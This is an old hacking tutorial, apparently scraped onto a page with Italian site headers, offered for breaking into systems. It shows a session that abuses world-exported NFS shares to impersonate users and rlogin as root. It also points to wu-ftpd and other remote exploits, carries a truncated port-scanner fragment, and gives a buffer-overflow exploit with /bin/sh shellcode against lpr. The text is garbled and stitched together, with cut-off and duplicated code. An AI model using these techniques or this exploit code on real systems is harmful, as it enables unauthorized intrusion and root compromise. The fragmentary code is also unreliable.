Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
________________________________________________
_________________________________
Well, this ain't exactely for begginers, but it'll have to do.
What all hackers has to know is that there are 4 steps in
hacking...
mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.
mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home
/tmp/mount/
mysite:~>ls -sal /tmp/mount
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18
at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42
john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24
paul/
1 -rw------- 1 root root 242 Mar 9 1997
sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 102 100 1024 Oct 20 18:57
rapper/
mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18
at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42
john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24
paul/
1 -rw------- 1 root root 242 Mar 9 1997
sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 rapper daemon 1024 Oct 20 18:57
rapper/
/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept
connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
if (argc != 2) {
printf("Usage: %s hostname\n", argv[0]);
exit(1);
}
then
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#
Or if the site is really old, use that (quote site exec) old
bug for
wu.ftpd.
There are a lot of other exploits, like the remote
exploits (innd, imap2,
pop3, etc...) that you can find at
rootshell.connectnet.com or at
dhp.com/~fyodor.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$'
`````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$
$$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$
.g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$
$$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$
$$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$
$$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$
$$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S'
$$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
u_long get_esp()
{
__asm__("movl %esp, %eax");
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x
89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x
8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}